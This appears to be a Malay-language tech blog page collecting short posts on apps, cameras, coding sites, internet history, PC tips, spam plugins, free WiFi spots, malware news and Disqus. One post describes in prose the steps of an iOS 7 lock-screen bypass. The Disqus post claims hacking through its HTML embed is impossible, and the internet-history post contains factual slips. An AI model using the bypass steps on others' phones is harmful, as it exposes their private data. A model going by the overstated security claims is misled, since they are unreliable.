Showing posts with label Info. Show all posts
Showing posts with label Info. Show all posts

Info Solat dan Lain Lain dengan Aplikasi Muslim Pro


Dengan perkembangan dunia teknologi maklumat (IT) hari ini yang dilihat semakin berkembang dari hari ke hari, secara tidak langsung ia turut mempengaruhi gaya hidup masyarakat setempat.

Hari ini, masyarakat dilihat menjalani proses kehidupan lebih efisien dengan kemudahan mobiliti yang kian rancak dibangunkan, sekali gus memperlihatkan kebangkitan aplikasi rangkaian sensor.

Muslim Pro adalah antara aplikasi yang komprehensif untuk penganut agama Islam.

Aplikasi tersebut menyediakan waktu solat berdasarkan lokasi pengguna, penunjuk arah kiblat seluruh dunia, berhubung dengan aplikasi lokasi popular, Foursquare, untuk pencarian restoran halal serta masjid, dan tidak ketinggalan bacaan serta mempelajari al-Quran.

Aplikasi berkenaan boleh digunakan di telefon pintar yang mempunyai platform iOS (produk Apple) dan Android bahkan ia juga dapat digunakan di laman sesawang (www.muslimpro.com) untuk mendapatkan waktu solat serta penunjuk arah kiblat.

Sehingga saat ini, aplikasi Muslim Pro telah dimuat turun lebih daripada lima juta kali, terutama dari negara-negara Islam seperti Arab Saudi, Emeriyah Arab Bersatu (UAE), Indonesia, Malaysia, Turki, dan Maghribi.

Tidak ketinggalan negara-negara yang mempunyai majoriti penduduk Islam seperti Perancis, United Kingdom (UK), Amerika Syarikat serta Singapura.

"Ini adalah aplikasi terbaik dan praktikal yang terkandung di dalam iPhone saya dan sudah pasti ia merupakan aplikasi yang sering digunakan.

"Arah kiblatnya sangat tepat malah waktu solat akan bertukar mengikut lokasi di mana kita berada.

"Aplikasi ini sangat bagus dan berguna", kata seorang pengguna yang berasal dari United Kingdom.

Pada masa yang sama, Muslim Pro telah terbukti merupakan satu aplikasi yang amat berguna bagi umat Islam yang sering bergerak dari satu tempat ke satu tempat.

Aplikasi ini memiliki semua yang diperlukan dan telah dibangunkan dengan teliti.

Inilah teman perjalanan yang sempurna, melalui berbagai zon waktu yang berbeza, dari China ke Asia Tenggara seterusnya ke UK. Mulai dari waktu solat hingga penunjuk arah kiblat, aplikasi ini turut memiliki bacaan al-Quran yang dapat dimuat turun dalam bentuk audio (suara).

Bagi mereka yang melancong juga dapat melihat senarai masjid serta restoran halal di mana sahaja anda berada. Ia sangat bermanfaat.

Sebelum ini, Muslim Pro banyak digunakan pada bulan Ramadan. Untuk itu tidak hairan sekiranya jumlah penggunaan aplikasi ini akan melonjak pada bulan tersebut.

Untuk memenuhi keperluan bagi pengguna yang tidak menggunakan telefon pintar dan iOS, pemaju aplikasi ini, Bitsmedia, yang berpangkalan di Singapura, baru-baru ini telah melancarkan versi laman sesawang daripada aplikasi ini.

Boleh dilayari di www.muslimpro.com, laman sesawang ini mesra pengguna malah dengan penggunaan teknologi moden di samping pengkomputeran awanan Google ia mampu dimuat turun dengan lebih cepat berbanding format biasa yang ditawarkan di komputer meja, tablet dan juga telefon.

Ketua Pegawai Eksekutif (CEO), Bitsmedia Erwan Mace berkata, pihaknya sangat gembira dengan maklum balas positif yang diterima dari umat Islam seluruh dunia.

''Ini adalah motivasi kepada kami untuk membangunkan Muslim Pro menjadi aplikasi yang lebih baik,'' katanya.

Kini dalam perancangan, Bitsmedia akan membangunkan aplikasi Muslim Pro untuk pelbagai platform dalam usaha memenuhi ciri-ciri telefon terkini.

Pada masa yang sama, mereka juga merancang untuk menjalin kerjasama dengan syarikat-syarikat telekomunikasi serta perusahaan untuk membangunkan pangkalan data masjid dan juga restoran halal sehingga tidak lagi perlu bergantung pada Foursquare.

''Tahun ini merupakan tahun yang menarik.

''Penglibatan dalam perniagaan yang berasaskan teknologi bermakna harus menghasilkan produk serta inovasi yang tidak berubah dan semestinya produk yang dihasilkan amat berguna dan berkaitan dengan teman-teman kami yang beragama Islam," jelas Mace.

Tambah beliau lagi, pihaknya berharap agar produk serta perkhidmatan yang diberikan akan menjadi sumber inspirasi kepada masyarakat yang beragama Islam dalam usaha untuk menghasilkan teknologi yang berkaitan dengan keperluan agama mereka.

Kamera tanpa cermin pertama di dunia


Panasonic Malaysia baru-baru ini tampil dengan inovasi baru dengan memperkenalkan rangkaian kamera Lumix bagi memenuhi keperluan dan cita rasa golongan wanita yang sentiasa bergerak ke sana-sini.

Rangkaian kamera baru ini bercirikan reka bentuk bergaya dengan badan kompak yang direka untuk menarik perhatian konsumer wanita yang muda, kuat dan aktif.

Siri Lumix G, kamera pertama di dunia tanpa cermin , penuh dengan pelbagai inovasi baru serta ciri ciri berkualiti tinggi bagi menawarkan satu pengalaman fotografi yang menyeronokkan.

Pengarah Urusan Panasonic Malaysia, Yosuke Matsunaga berkata, pihaknya akan terus memperkenalkan kamera baru lagi dipertingkatkan kepada pengguna di negara ini bagi menepati trend penggunaan kamera yang sentiasa berubah.

"Kamera seharusnya menjadi satu kaedah mudah untuk merakamkan pemandangan serta memori indah sambil kita men jalankan aktiviti harian dan kita seharusnya dapat berkongsi pengalaman atau memori ini dengan serta merta bersama insan insan tersayang," ujarnya.

Siri Lumix G baru , GF6 memiliki ciri ciri nilai tambah tambahan yang sesuai untuk semua pengguna kamera yang mementingkan kualiti serta prestasi tinggi.

Venus Engine yang baru diperbaiki menahan bunyi bising frekuensi rendah tanpa mengurangkan ketajaman gambar yang dirakamkan oleh GF6 dengan 16 megapiksel.

Model berkenaan berupaya menghasilkan kualiti gambar yang mengagumkan walaupun dalam keadaan cahaya rendah.

GF6 juga memberikan respons yang lebih tinggi di mana ia hanya memerlukan 0.5 saat untuk mengambil gambar selepas dihidupkan.

Dengan GF6, anda tidak lagi akan terlepas peluang - peluang keemasan untuk mengambil gambar.

Bukan itu sahaja, selaku yang pertama dalam industri kamera sistem yang menawarkan WiFi dengan fungsi New Field Communicator (NFC).

GF6 juga membolehkan pengguna untuk menyentuh dan berkongsi gambar dengan telefon pintar berkeupayaan NFC.

Panduan Asas: Belajar coding untuk Pemula (beginner)

Assalamualaiikum dan selamat sejahtera.
Lama [GH] tidak menulis artikel didalam topik Panduan Asas, Hari ini kami akan kongsikan laman laman web yang menyediakan perkhidmatan secara percuma untuk anda yang ingin belajar coding atau bahasa pengatucaraan seperti html,php, javascript dan css. ia sangat sesuai kepada mereka yang berminat untuk menceburi bidang ini dan Jadi sebagai Pemula!


1) w3schools
W3schools adalah diantara yang paling popular kerana ia membantu pemula untuk belajar kod dari A sehingga Z.
Semua Anda perlu lakukan adalah hanya pergi ke W3schools dan pilih tutorial yang anda ingin pelajari.
Tiada kemahiran diperlukan.
Anda akan belajar: HTML / CSS (HTML5/CSS3), Javascript, PHP, ASP, XML, AJAX, jQuery


2) Codecademy
Codecademy adalah alternatif yang terbaik selepas W3schools, dengan Codecademy, anda boleh belajar apa-apa bahasa dan memulakan pengaturcaraan dengan cara yang mudah difahami.
Tiada kemahiran diperlukan.
Anda akan belajar: HTML / CSS, PHP, jQuery, JavaScript, Python, Ru


3) Code avengers
ama seperti Codecademy, Code avengers menyediakan menggunakan platform yang mudah dengan cara yang menarik untuk coding dan mendapat pengalaman.Tersedia dengan 3 Tahap yang pengguna perlu lulus untuk menjadi seorang pakar.
Tiada Kemahiran yang diperlukan
Anda akan belajar: HTML / CSS (HTML5/CSS3), JavaScript



4) CodeSchool
CodeSchool mempunyai paparan muka yang sangat cantik dan mudah digunakan
Tiada kemahiran diperlukan.
Bahasa anda akan belajar: HTML / CSS, Ruby on Rails, JavaScript, IOS


5) TeamtreeHouse
TeamtreeHouse hampir serupa dengan codeschool, ia memberikan anda cara mudah untuk belajar bahasa pengatucaraan dengan lebih cepat.
Tiada kemahiran diperlukan.
Bahasa anda akan belajar:  HTML / CSS, IOS, Android, Wordpress

Sejarah Internet

Gambar Sekadar Hiasan

Assalamualaiikum dan Selamat Sejahtera.
Internet merupakan satu rangkaian sedunia komputer yang tersambung menerusi talian telefon, gentian optik, teknologi tanpa wayar seperti 3G,WIMAX,EDGE dan WIFI.

Asal-usul internet bermula semasa Perang Dingin. Satu rangkaian telah dicipta untuk menghubungkan semua komputer tentera di sekitar Amerika Syarikat supaya sekiranya tercetus serangan nuklear, peralatan tentera Amerika Syarikat masih dapat berfungsi. Mesin-mesin ini disambungkan melalui talian telefon. Dua mesin pertama telah berjaya disambungkan pada akhir tahun 1969.

Dalam 15 tahun pertama selepas terciptanya rangkaian ini, tapak yang tersambung hanyalah tapak-tapak tentera dan akademik. Pelbagai rangkaian telah didirikan termasuk ARPAnet yang menyambungkan universiti.universiti di Amerika Syarikat dan MILnet yang menyambungkan pangkalan-pangkalan tentera. ARPAnet (Advanced Research Project Agency) adalah salah satu bahagian Jabatan Pertahanan Amerika Syarikat turut menghasilkan kaedah pensuisan paket (packet swiching) bagi menghubungkan pelbagai jenis komputer.

Menjelang tahun 1970, rangkaian komputer yang pertama menggunakan teknik pensuisan paket di Amerika Syarikat telah menghubungkan sistem komputer di University of California di Los Angeles (UCLA), University of California di Santa Barbara (UCSB), Stanford University dan University of Utah di Salt Lake City.


Pada 1972, terdapat 40 tapak rangkaian yang kecil dihubungkan kepada rangkaian ARPAnet. Ketika itu, rangkaian ini digunakan untuk menghantar fail teks yang kecil di antara pengguna. Kini ia lebih dikenali sebagai E-Mail dan semakin popular digunakan.

Pada awalnya piawai komunikasi yang asal dikenali sebagai NCP "Network Control Protocol". Setelah mengkaji teknik yang lebih canggih piawai kualiti tinggi digunakan iaitu TCP/IP .TCP (Transmission Tranfer Protocol) dimana ia akan mengubah mesej kepada bentuk paket di sumber dan kemudiannya akan mengubah semula kebentuk mesej di destinasi. IP (Internet Protocol) pula mengendalikan alamat. ARPA bukan sahaja mempelopori NCP malah Ethernet, FDDI dan X.25.

Pada tahun 80-an, rangkaian-rangkaian ini mula disambungkan secara komersial. Kita boleh mengunjungi dari satu rangkaian ke satu rangkaian yang lain dan pada masa inilah istilah "internet" mula digunakan.

Pada masa itu juga, perkhidmatan internet capaian awam mula diwujudkan. Sehingga 1990, internet lebih banyak digunakan dalam bidang penyelidikan saintifik. Apabila penggunaan internet oleh komuniti saintifik semakin berleluasa, orang awam juga mula menyedari potensi internet sebagai sejenis medium komunikasi, hiburan dan pendidikan sedunia. Walaupun dimulakan sebagai sebuah rangkaian ketenteraan, kini terbuktilah internet mempunyai banyak kegunaan lain.

Jika dilihat dahulu, hanya terdapat 4 nod sahaja dalam rangkaian ARPAnet. Tetapi kini terdapat 10 ribu nod dalam internet, yang tersebar melebihi 42 negara seluruh dunia. Pada hari ini, terdapat lebih daripada 40 juta pengguna internet di seluruh pelusok dunia.

Di Malaysia internet dilancarkan pada tahun 1987 apabila Institut Mikroelektronik Malaysia (MIMOS) memulakan Rangkaian Komputer Malaysia atau RangKom. Kemudian Jaring yang diperkembangkan daripada RangKom dilancarkan pada tahun 1990.

Tips Tingkatkan prestasi komputer


EVOLUSI teknologi pengkomputeran hari ini begitu pantas lantas menjadikan kadar keupayaan pengkomputeran berganda hampir setiap hari.
Sekiranya usia komputer anda telah menjangkau 10 tahun, ia mungkin sudah dianggap sebagai 'fosil' kerana kemampuan pemprosesan dan capaian fungsinya sudah terbatas.

Anda mungkin perlu mempertimbangkan untuk mendapatkan komputer baru.

Usaha menaik taraf komponen-komponen mungkin tidak lagi relevan disebabkan beberapa faktor. Antaranya seperti kesukaran untuk mendapatkan komponen gantian atau komponen yang berada di pasaran hari ini tidak menyokong teknologi yang terlebih awal wujud pada sistem komputer lama anda.

Akan tetapi, sekiranya komputer anda baru berusia beberapa tahun tetapi kurang responsif dan amat perlahan terutamanya ketika menggunakan program tertentu, ia berkemungkinan mempunyai masalah yang berkaitan dengan perisian dan bukannya perkakasan.

Langkah berikut boleh diambil bagi mengatasi permasalahan berkaitan prestasi komputer yang menurun:

Buat imbasan virus
Lakukan imbasan virus menggunakan perisian antivirus anda. Sebelum itu, jangan lupa untuk mengemaskini antivirus sebelum melakukan imbasan.

Serangan virus merupakan salah satu punca prestasi komputer menurun lalu bertindak balas dengan begitu perlahan.

Selain virus, program-program lain yang turut boleh menyebabkan masalah yang sama adalah seperti Trojan dan Spyware yang lazimnya menyerang komputer yang sering bersambung dengan Internet.

Buang program yang tidak diperlukan
Tidak semua program yang ada di dalam komputer anda digunakan dengan kerap. Malah, ada di antaranya digunakan sekali sahaja. Langkah mengurangkan program di dalam komputer akan membebaskan ruang storan sekali gus meningkatkan kelajuan dan upaya pemprosesan.

Secara tidak langsung, ia membantu mengurangkan masalah keadaan fail di dalam cakera keras yang tidak tersusun. Selalunya jika faktor itu tidak diberi perhatian dan diambil tindakan sewajarnya, kelajuan komputer anda boleh terjejas.

Mematikan komputer selepas digunakan
Selain menjimatkan penggunaan elektrik, amalan ini dapat mengelakkan kerosakan pada komponen komputer akibat kepanasan yang melampau.

Sesetengah pengguna komputer hanya mengakhiri penggunaan komputer dengan membiarkannya dalam keadaan log off. Adalah lebih baik jika memilih shut down dan suisnya dipadamkan.

Sekiranya komputer anda dihidupkan berhari-hari secara berterusan dan anda mendapatinya ia beroperasi terlalu perlahan, lakukan restart bagi memberikan komputer anda sedikit masa untuk 'berehat'.


Guna program pembersih registry
Program-program yang telah dibuang dari komputer sebenarnya masih meninggalkan sedikit fail dalam bentuk registry atau pangkalan data dalaman sesebuah komputer.

Program pembersih registry dapat membantu pengguna komputer, terutamanya mereka yang agak baru dalam dunia pengkomputeran. Ia merupakan kaedah yang termudah dan selamat bagi 'membersihkan' komputer anda dari fail-fail yang tidak diperlukan.

Format cakera keras
Ini mungkin jalan terakhir, tetapi paling berkesan dalam menangani masalah-masalah yang berkaitan dengan sistem komputer anda. Sekiranya masalah terlalu serius, anda mungkin perlu memformat cakera keras anda dan melakukan instalasi sistem operasi semula.

Ini akan memberikan nafas baru kepada komputer dan anda pastinya dapat melihat perubahan positif setelah cara itu dilakukan.

Namun, pastikan anda terlebih dahulu telah menyalin dokumen dan fail-fail penting anda ke storan lain kerana cara ini akan menghilangkan kesemua data dan sistem operasi yang terkandung di dalam komputer anda.

OlehKHAIRUL ANUAR ABDUL RAHMAN

Elakan Spam Pada Komen Dengan Growmap Anti Spambot


Assalamualaiikum dan Selamat Sejahtera.
SPAM? Rasanya tak perlu diterangkan lagi mengenainya..
Ia sentiasa berlaku akibat dari penyalahgunaan alamat email dan juga terjadi pada bahagian komen blog. Untuk WordPress, ada satu langkah mudah mengelakkan SPAM autobot yang menyerang pemilik blog berasaskan WordPress. Ini memastikan komen yang dihantar adalah dari manusia yang perlu menaip secara manual dan bukan dari autobot.

Kami Cadangkan anda menggunakan Plugin Growmap Anti Spambot.Ia sangat mudah digunakan dan tidak membebankan pelawat sperti Captcha.Dengan Growmap Anti Spambot, pelawat hanya perlu tick/tanda pada kotak untuk meinggalkan komen.Ia dijana melalui JavaScript yang ditetap bagi mengelakan dilihat oleh bots, ianya 99% bebas dari semua jenis bot spam.

Screenshot:


Check Box secara automatik diperiksa sebelum komen dikemukakan.Jadi tidak ada yang komen akan hilang jika ia dikemukakan oleh pengguna manusia yang sah (bukan bots).Muat turun Plugin Growmap Anti Spambot melalui button download dibawah.

Download Growmap Anti Spambot Plugin

Jika anda mempunyai masalah ketika memasang Plugin ini atau ia tidak berfungsi, sila rujuk Artikel disini: Growmap Anti Spambot Plugin Tidak Berfungsi. [GH] berharap sedikit sebanyak perkongsian ini memberi manfaat buat pembaca..

Bypass iPhone iOS 7 LOCK SCREEN Vulnerability


Assalamualaikum dan selamat sejahtera [GH] ucapkan kepada semua pembaca. Baru-baru ini Apple telah melancarkan 1 lagi versi iOS yang terbaru iaitu iOS7 di WWCD 2013. 

Dan selepas 48 jam pelancaran iOS7 itu, seorang pengguna iPhone bernama Jose Rodriguez telah berjaya memintas skrin kunci untuk mengakses aplikasi Photos dalam beberapa saat.

iOS sangat terkenal dengan 'lockscreen security bugs' yang membolehkan sesiapa sahaja memintas kod laluan pada peranti untuk mengakses maklumat yang berkemungkinan adalah rahsia. Video dibawah menunjukkan bagaimana untuk sepenuhnya memintas perlindungan kata laluan iPhone dengan mengakses kalkulator yang ada pada skrin kunci. 



"Dengan membuka Bilik Kawalan iOS dan mengakses aplikasi kalkulator telefon sebelum membuka kamera telefon sesiapa sahaja boleh mengakses, memadam, e-mel, memuat naik atau tweet gambar yang ada dalam peranti itu tanpa mengetahui kod laluan."

Pengambilan Putera Army sesi Ke -3


Assalamualaiikum dan Selamat sejahtera!
Ada berita baik kepada anda yang terlepas atau tidak diterima ketika cuba memohon kemasukan akedemi Putera Army RileksCrew yang lepas. Jika anda baru mengikuti blog [GH], ada boleh rujuk artikel ini berkenaan Putera Army. [ baca disini ]

Kami dimaklumkan, Kumpulan pecinta IT malaysia "RileksCrew" akan membuat pengambilan ke akedemi Putera Army tidak lama lagi.Untuk mendapat info terkini berkaitan kelas kelas IT percuma dalam talian seperti ini, Jangan Lupa untuk sertai kami Di facebook GilerHackers.

Pertanyaan Lanjut, anda boleh ke Facebook Rasmi RileksCrew di www.facebook.com/HackingCorps

"Jika anda sokong Komuniti ini, kongsikan kepada rakan rakan anda dengan menekan button Like, Tweet, atau Share Dibawah.anda juga boleh menampal banner yang disediakan dibawah pada laman web anda sebagai tanda sokongan."

Dengan Kerjasama RileksCrew & Dragon Force Malaysia.

Senarai Wifi Percuma Di Negeri Selangor

Assalamualaiikum dan Selamat Sejahtera.
Selepas kemenangan Pakatan Rakyat di Negeri Selangor pada PRU13 lalu, kerajaan Negeri Selangor kini maju setapak lagi apabila melancarkan Wifi Percuma Selangorku di sekitar kawasan negeri Selangor.

Berikut adalah kawasan-kawasan yang akan mendapat liputan Wifi Selangorku di Negeri Selangor.


  1. Kawasan Kedai Selva, Jalan Raya Barat, Kawasan 1, 41100 Klang
  2. Kawasan Kedai Jalan 2/5. Taman Pinggiran Delima Batu 14, 48100 Hulu Langat
  3. Kawasan Kedai Jalan Amaniah Mulia 3, Taman Maniah Mulia, 68100 Batu Caves
  4. Kawasan Kedai Jalan Taman Gombak, 68100 Gombak
  5. Kawasan Kedai Jalan Bersatu 10, Taman Bersatu 48000 Rawang
  6. Kawasan Kedai Jalan Desa 1/1, Bandar Country Homes, 48000 Rawang
  7. Kawasan Kedai Jalan Besar Pandaraman, 42000 Pelabuhan Klang
  8. Surau Haji Abas Kampung Delek, Klang
  9. Balai Penghulu Mukim Batu, Batu Caves
  10. Transit Az-Zahrah Teluk Gadong Kecil, Klang
  11. Restaurant Mekar Sri Bakso, No50/G-11 Plaza Sri Muda, Sek 25, 40400 Shah Alam
  12. Dewan Sungai Pinang, Majlis Perbandaran Klang, Jalan Labis 100, 41400 Klang
  13. Kawasan Kedai, Jalan Mohd Tahir 8, Tmn Sri Mewah 4, Off Jalan Sg. Jati, Seri Andalas
  14. SJK (C) Pandamaran A, Jln Besar Pandamaran, 41200 Klang
  15. Pusat Komuniti Sg.Kantan, 43000 Kajang
  16. Pusat Khidmat Adun Kajang, Kawasan Sungai Chua, Kajang
  17. Pusat Komuniti Dun Bangi, No.22 Jln 7/1C Sek 7, 43650 Bangi
  18. Pusat Khidmat Masyarakat, Kg. Batu Laut, 42700 Tanjong Sepat
  19. Kampung Sg.Sendu & Pekan Banting
  20. Kawasan Kedai A77, Jln Besar, 45600 Bestari Jaya
  21. Pejabat JKK Kampung Meru @ Sebelah Dewan Orang Ramai MPK Jln Meru Tambahan, 41050, Meru
  22. Kawasan Kedai Makan, Jalan Raya Barat, Kawasan 1, 41100 Klang
  23. Kg.Meru, 41050, Meru
  24. Pejabat Pangsapuri Mutiara Bukit Raja 2, Jln Mahkota 1/ku2, Mutiara Bukit Raja 2, Klang
  25. Masjid Al-Azhariah, Jln Kepau 18/4 Shah Alam
  26. Pangsapuri Idaman Jalan PJU 10/1 Damansara Damai, 47830 Petaling Jaya
  27. Pangsapuri Kos Rendah SS19, Jln SS19/7, Subang Jaya
  28. Balai Raya Taman Cuepacs, Jln Koop Cuepacs 5A, Taman Cuepacs Fasa 2, Batu 9, 43200, Cheras
  29. Medan Selera Pandan Indah 2/3 Jln Pandan, Ilmu Pandan Indah 2/3
  30. Flat Permai Court 2, Jln 13D Taman Dato Ahmad Razali 68000 Ampang
  31. Dewan Kampung Melayu Ampang Tambahan, Jln 4 Kg. Melayu Ampang Tambahan, Ampang
  32. Pusat Komuniti Rakyat Sri Pangsa AU3/1, Ulu Kelang
  33. Bazaar MPAJ Taman Melawati, Ulu Kelang
  34. No 8 Jln 1/4 Pusat Khidmat Masyarakat 43650 Bdr Baru Bangi
  35. Masjid Ar-Raudah Kg. Hulu Teris, Sg Pelek
  36. Pusat Penjaja Taman Seroja Bandar Baru Salak Tinggi

Facebook Membawa Ketagihan


Facebook Membawa Ketagihan. Tidak dinafikan lagi Facebook sememangnya membawa ketagihan kepada penggunanya. Daripada survey yang dijalankan di London, pengguna Facebook akan menghabiskan masa terlalu lama menggunakannya sehingga mereka tidak gembira dengan kehidupan mereka sendiri

Menurut survey yang dijalankan itu, pengguna yang mula membuka komputer akan terus masuk ke laman web jaringan tersebut. Golongan yang berpendapatan dan berpendidikan rendah adalah golongan yang didapati berisiko tinggi mengalami ketagihan itu.

Sebahagian daripada responden merasakan kehidupan mereka yang dikecapi selama ini telah diambil oleh Facebook. Banyak masa yang diluangkan hanya untuk Facebook sehinggakan tiada masa untuk melakukan perkara penting yang lain.


Daripada survey yang dibuat secara rawak itu, 85 peratus daripada mereka mengakui menggunakan Facebook setiap hari dan sebahagian dari mereka akan membuka laman tersebut terlebih dahulu berbanding laman web yang lain tidak kira menggunakan komputer atau alat telekomunikasi yang lain.

Di Malaysia, ketagihan menggunakan Facebook juga dilihat sama tahapnya dengan pengguna pengguna lain di luar negara. Pengguna Facebook di Malaysia banyak menghabiskan masa di Fanpage serta Group dengan membaca status, menonton video, membalas komen serta bersembang dan mereka sanggup menghabiskan masa seharian di depan komputer.

Sumber

Facebook, firma-firma kewangan disasarkan serangan Malware


Facebook squashes Dorkbot
Ahli Facebook disasarkan oleh program merosakkan dipanggil Dorkbot. Program ini terutamanya merebak melalui Facebook chat, tetapi ia juga boleh menyebarkan peranti USB yang menyeluruh, kata Bianca Stanescu daripada BitDefender.

Dorkbot berpura-pura menjadi fail gambar tetapi sebenarnya adalah satu program yang memasang kod berniat jahat pada mesin apabila seseorang cuba untuk membuka fail tersebut. Maklumat dalam talian persalinan Mediafire menemui fail beracun di pelayan itu dan telah mengambil langkah-langkah untuk sampah mereka, termasuk mengelap fail dengan sambungan dua, seperti. Jpg.exe. Png.exe, dan. Bmp.exe.

Dorkbot mengandungi beg biasa helah malware. Ia akan mencuri maklumat sensitif dari mesin yang dijangkiti dan boleh menyekat kemas kini perisian antivirus untuk melindungi dirinya daripada diketahui.

Pulangan PushDo
Penyelidik juga dilaporkan pada minggu lepas bahawa keluarga botware lama diajar beberapa helah baru. Botware digunakan untuk menubuhkan satu rangkaian mesin yang dijangkiti yang boleh digunakan untuk pelbagai tugas jahat. PushDo adalah keluarga botware tua beruban dan, menurut Damballa Kanan Penyelidik Jeremy Demar, ia sedang diubahsuai untuk menggunakan Algoritma Generasi Domain sebagai mekanisme sandaran apabila perintah dan server kawalan terganggu.

Teknik ini membolehkan botnet menjalankan perisian untuk mewujudkan lebih daripada satu ribu nama domain palsu dan unik sehari, dan untuk menyambung kepada mereka jika arahan dan pelayan kawalan tersingkir oleh pejuang bot. Ini kedut terbaru dalam PushDo menunjukkan sekali lagi daya tahan penulis. Botnet telah ditutup empat kali dalam tempoh lima tahun yang lalu, hanya untuk bangkit semula dari mati, seperti mesin zombie dalam rangkaian. PushDo mempunyai beberapa cara lain yang diam-diam, Demar menulis.

"Malware akan menjana trafik palsu ke laman web yang sah dalam usaha untuk menutup C & C yang komunikasi, dengan 200 nama-nama domain untuk menghubungi," katanya. "C & C pelayan juga akan bertindak balas dengan imej jpeg dengan disulitkan, muatan malware tertanam untuk menyembunyikan apa-apa fail tambahan ia mahu turun." Bank of America, Citibank, dan Dun & Bradsteet bertajuk beberapa penipuan yang disasarkan untuk perniagaan minggu lalu.

Institusi-institusi kewangan yang disasarkan
Solera Networks melambai bendera merah sepanjang kempen spam menyamar sebagai "pernyataan saudagar" dari bank. The detritus digital mengandungi perkataan-pemprosesan fail-a. Doc atau. Rtf dan jika dibuka, mengeksploitasi kelemahan diperbaiki oleh Microsoft pada tahun lalu untuk memasang pencuri kata laluan pada mesin yang dijangkiti.

The Dun & Bradstreet penipuan adalah satu perubahan yang lama Better Business Bureau penipuan. Dalam kes ini, sasaran yang menerima e-mel rasmi yang berpandangan dari D & B mendakwa aduan telah dibuat terhadap mereka. Sasaran boleh melihat aduan dengan klik pada lampiran kepada e-mel. Berbuat demikian, sudah tentu, memasang Trojan pada mesin mereka yang akan mencuri maklumat peribadi daripada peranti, menurut Barracuda Networks.

Hilangkan Bosan dengan permainan mini Super Mario Di GilerHackers



"ANDA BOLEH MENCUBA PERMAINAN SUPER MARIO DIATAS"
Mario
adalah karakter fiksi pada permainan video, diciptakan oleh desainer permainan video, Shigeru Miyamoto. Menjadi maskot Nintendo, Mario telah mucul pada lebih dari 200 permainan video sejak pembuatannya. Mario kini banyak muncul dalam berbagai jenis permainan video, seperti balapan, puzzle, permainan perang, fighting, olahraga, dan lainnya.

Mario digambarkan sebagai tukang kayu juga tukang ledeng Italia yang pendek dan gemuk di Kerajaan Jamur. Pada serial Mario, ia berkali-kali menghentikan rencana Bowser menculik Princess Peach dan menaklukan Kerajaan Jamur. Ia juga memiliki teman dan musuh lain.

Sebagai maskot Nintendo, Mario adalah salah satu karakter paling terkenal dalam sejarah permainan video,[1] dan Mario menjadi sinonim dengan permainan video. Permainan Mario telah terjual lebih dari 201 juta unit, menjadikan serial Mario sebagai serial permainan video paling banyak terjual.

Konsep
Mario diciptakan oleh Shigeru Miyamoto dalam usahanya untuk membuat permainan video yang laris untuk Nintendo, setelah permainan-permainan sebelumnya, seperti Sheriff, tidak berhasil meraih sekses. Awalnya, Miyamoto ingin membuat permainan video dengan menggunakan karakter Popeye, Bluto, dan Olive Oyl. Akan tetapi, dia tidak dibenarkan menggunakan karakter-karakter tersebut, sehingga akhirnya dia membuat Jumpman (kemudian dikenal sebagai Mario), Donkey Kong, dan Pauline.


Penampilan
Shigeru Miyamoto sebagai pencipta Mario memakaikan topi pada karakter Mario kerana merasa kesulitan menggambar rambut pada saat itu. Selain itu mulut juga mengalami nasib yang sama, Shigeru lebih memilih memakaikan kumis tebal pada Mario. Mario biasanya memakai baju yang merupakan kombinasi antara kaus biru dan overall berwarna merah, tetapi pada game Super Mario Bross, kaus Mario berubah menjadi warna coklat muda.

Saudara Kandung
Mario memiliki seorang saudara kandung yang bernama Luigi. Luigi muncul pertama kali pada tahun 1983 dalam game Mario Bros. Pada awalnya Luigi selalu dianggap sebagai adik Mario yang sedikit lebih muda.


Musuh Abadi
Memang Bowser selalu tampil menjadi musuh utama Mario dalam kebanyakan game, tetapi sesungguhnya Mario memiliki musuh abadi yang memiliki nama Wario. Nama Wario itu sendiri berasal dari gabungan kata "warui" yang ertinya tidak baik dan Mario. Berbeza dengan Mario yang diciptakan oleh Shigeru Miyamoto, Wario diciptakan oleh Gunpei Yoko. Wario muncul pertama kali pada tahun 1992 dalam game Super Mario Land 2: 6 Golden Coins sebagai musuh utama sekaligus raja terakhir game tersebut. Karakter Wario memiliki beberapa fakta unik, pertama-tama tinggi badan Wario selalu berubah-ubah, kadang kadang Wario digambarkan lebih tinggi dari Mario dan terkadang sebaliknya

Aplikasi Disqus terbaik untuk pengurusan komen blog


Assalamualaiikum dan selamat sejahtera.Jika anda perhatikan pada kotak komentar. [GH] menggunakan sistem disqus.dahulu kami menggunakan facebook komen,kenapa beralih kepada sistem komentar Dari Disqus?

Walaupun ada yang tidak menyukai penggunaan sistem disqus,tetapi disqus mempunyai banyak kelebihan.selain hanya dari log masuk menggunakan akaun social seperti facebook,twitter, google+ dan sebagainya. Disqus mempunyai kelebihan yang tersendiri.

Menjimatkan masa
Ini merupakan perkara pertama yang akan diberi perhatian oleh sesiapa sahaja -- kelebihan penggunaan aplikasi Disqus. Sekiranya anda membina laman web dinamik (tidak melibatkan penggunaan CMS), penggunaan Disqus boleh menjimatkan masa untuk penghasilan sistem komen. Setiap kod fungsi untuk satu-satu komen diselesaikan oleh pihak Disqus dan bukan anda.

Multi-rangkaian dengan laman sosial
Selain itu, Disqus juga menyediakan kolaborasi dan gabungan rangkaian dengan laman-laman sosial seperti Google, Facebook dan Twitter. Setiap pengguna boleh mengesahkan identiti mereka hanya dengan satu klik pada butang pilihan. Bagi laman binaan sendiri, anda tidak perlu menyediakan fungsi pendaftaran untuk mendapatkan fungsi komen yang lebih selamat. Atau penggunaan sistem CMS juga boleh dinyahaktifkan sistem komen bagi digantikan sepenuhnya dengan Disqus.

Keselamatan terjamin
Disqus juga menyediakan sistem keselamatan berperingkat termasuklah penapisan kepada serangan injeksi SQL, XSS dan skrip-skrip berbahaya. Selain itu, cubaan mengodam laman tidak boleh dilakukan menerusi Disqus kerana kod yang anda gunakan hanyalah kod HTML yang biasa. Adalah mustahil untuk menggodam menerusi kod HTML.

Moderator berbilang
Disqus juga menyediakan fungsi moderator berbilang. Maknanya setiap komen yang dihantar boleh diuruskan oleh berbilang pengguna. Dan yang penting, ianya berpusat. Sekiranya anda menggunakan Disqus pada lebih 50 laman, semua komen ini dikawal dan diuruskan di laman web Disqus.com sendiri.

Perkongsian data-data komen
Fungsi untuk menarik maklumat komen dari laman-laman lain boleh dilakukan dengan mudah. Dengan satu kod pengesahan, anda boleh berkongsi data-data komen dari lebih dua laman web berlainan (yang menggunakan sistem berlainan) pada laman web yang lain. Berbanding secara tradisional, data-data komen hanya terhad kepada laman web tersebut sahaja kecuali proses integrasi dan API digunakan.

Data disimpan selamanya
